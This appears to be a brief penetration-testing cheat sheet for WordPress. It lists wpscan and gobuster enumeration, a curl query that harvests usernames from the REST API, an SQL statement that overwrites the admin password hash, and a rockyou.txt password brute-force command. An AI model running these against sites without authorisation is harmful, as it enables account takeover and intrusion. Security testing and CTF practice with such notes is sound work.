Wordpress

wpscan --url $URL
wpscan --url $URL --api-token='...'

gobuster dir --url $IP --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

wpscan --url http://$URL -e ap --plugins-detection aggressive

wpscan --url $IP --enumerate u

curl $URL/index.php/wp-json/wp/v2/users -s | jq '.[].slug' | sed 's\"\\g'

UPDATE `wp_users` SET `user_pass` = '$P$BPNNFH6DCWFkvqe6CiUrKMXzu0cojQ1' WHERE user_login = 'admin';

wpscan --url $URL -U user.txt -P /usr/share/wordlists/rockyou.txt

grep -R 5.9.2 /workspace/latest/source_code